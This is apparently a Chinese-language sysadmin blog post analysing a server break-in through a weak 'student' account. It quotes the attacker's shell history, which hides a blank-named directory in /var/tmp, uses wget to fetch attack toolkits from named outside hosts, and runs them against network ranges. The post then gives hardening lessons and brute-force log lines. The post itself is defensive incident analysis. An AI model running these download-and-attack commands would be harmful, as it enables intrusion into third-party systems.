上一篇才在講偵測 hacking 的程式,前幾天有一台主機就被入侵了,而且是已經用 rkhunter 偵測過了,過程就是因為用了一個student/student的帳號密碼,這個帳號是用來傳ftp檔案,雖然密碼被猜中登入進來其實他權限很小,但是他利用這台主機再去攻擊別的電腦,不久這個IP就被電算中心斷線,我會發現是因為發現student的密碼被改掉了,所以才再查下去,剛好 .bash_history 他沒砍,來看一下他操作過程:
w // 先查看線上user
passwd // 改密碼,其實如果不改,比較難發覺被入侵
cd /var/tmp // 切換目錄到 /var/tmp,這個目錄每個人都有權限
mkdir ” ” // 建一個空白目錄,真的是空白,ls也看不到,除非注意到目錄個數
cd ” ”
wget serie.sapte.ro/as.tgz // 下載攻擊程式
tar zxvf as.tgz // 解壓縮
cd SSH/ // 這應該是程式放的位置
ls
./x 211.54; ./x 140.123 // 以下就開始執行攻擊程式,還有分網段在攻擊
./x 140.124; ./x 140.125; ./x 140.126 // 都是台灣的,真可憐
./x 140.127;./x 140.128;./x 140.129
exit // 離開
cd /var/tmp/” ” // 再次登入了
ls -a
cd SSH/
history
./x 140.109;./x 140.110;./x 140.111;./x 140.112;./x 140.113 // 再次攻擊
./x 140.114
./x 140.115; ./x 140.116; ./x 140.117; ./x 140.118; ./x 140.119; ./x 140.120
./x 140.121; ./x 140.122; ./x 140.123; ./x 140.124; ./x 140.125
exit // 離開
.
. // 省略
.
w // 登入,進來換另外一種工具攻擊
cd /var/tmp
mkdir ” ”
cd ” ”
wget smeckeru.iitalia.com/delles.tar.gz
tar zxvf delles.tar.gz
rm -rf delles.tar.gz
cd delles
./a 211.54; ./a 211.20
./a 140.123; ./a 140.120; ./a 140.121; ./a 140.122; ./a 140.124; ./a 140.125; ./a 140.126; ./a 140.127; ./a 140.128; ./a 140.129; ./a 140.130
./a 129.93
./a 130.64
./a 140.131;./a 140.132;./a 140.133;./a 140.134;./a 140.135;./a 140.136;./a 140.137;./a 140.138;
exit
查看last
# last | grep student
查到 IP 是 86.122.136.2
到 www.DNSstuff.com:http://www.dnsstuff.com/ 反查IP是從哪裡來的
答案是從 romania 羅馬尼亞 來的
我想這裡需要PO點心得,下次必須要注意的地方
1.在建user的帳號密碼時,不僅密碼設定要僅慎,帳號在挑選時就要盡量避免掉常用的會被猜到的帳號。
2.若帳號只單純做ftp登入,那就編輯 /etc/passwd,把shell設定成/sbin/nologin,使其無法登入減少被入侵的機會。
3.ssh 連線破壞性很強大,所以可以的話限制其連線區域。
4.做好帳號密碼控管比起套件修補重要一百倍。
5.其實這種攻擊方式很簡單也很保守,就是剛好遇到一個嗆司就剛好被他入侵,所以除了有rkhunter偵測以外,本身身為web master 的人帳號控管真的要先做好才是王道呀。
請檢查您的系統,以下的紀錄都是2011的
Oct 22 05:27:31 alpi3 sshd[37186]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 22 10:58:02 alpi3 sshd[37841]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 27 19:05:39 alpi3 sshd[18706]: error: PAM: User not known to the underlying authentication module for illegal user nancy from smallken.no-ip.org
Oct 27 22:26:41 alpi3 sshd[19071]: error: PAM: User not known to the underlying authentication module for illegal user recepcao from smallken.no-ip.org
Oct 28 10:45:45 alpi3 sshd[21385]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 28 17:17:17 alpi3 sshd[23676]: error: PAM: User not known to the underlying authentication module for illegal user shawn from smallken.no-ip.org
Oct 29 01:50:58 alpi3 sshd[26237]: error: PAM: User not known to the underlying authentication module for illegal user sftpuser from smallken.no-ip.org
Oct 29 11:16:49 alpi3 sshd[27920]: error: PAM: User not known to the underlying authentication module for illegal user wsmith from smallken.no-ip.org
Nov 18 15:14:12 alpi3 sshd[11225]: error: PAM: User not known to the underlying authentication module for illegal user Abel from smallken.no-ip.org
Nov 18 23:56:33 alpi3 sshd[13499]: error: PAM: User not known to the underlying authentication module for illegal user armine from smallken.no-ip.org
Nov 19 07:34:25 alpi3 sshd[21874]: error: PAM: User not known to the underlying authentication module for illegal user brown from smallken.no-ip.org
Nov 19 10:09:04 alpi3 sshd[22159]: error: PAM: User not known to the underlying authentication module for illegal user capp from smallken.no-ip.org
Nov 19 16:58:45 alpi3 sshd[23533]: error: PAM: User not known to the underlying authentication module for illegal user colette from smallken.no-ip.org
Nov 20 01:08:50 alpi3 sshd[24980]: error: PAM: User not known to the underlying authentication module for illegal user dexter from smallken.no-ip.org
Nov 20 02:35:27 alpi3 sshd[25148]: error: PAM: User not known to the underlying authentication module for illegal user domain from smallken.no-ip.org
Nov 20 02:55:50 alpi3 sshd[25181]: error: PAM: User not known to the underlying authentication module for illegal user donny from smallken.no-ip.org
Dec 2 01:36:24 alps5 sshd[18819]: error: PAM: Authentication failure for root from smallken.no-ip.org
Dec 2 01:36:24 alps5 sshd[18819]: error: PAM: Authentication failure for root from smallken.no-ip.org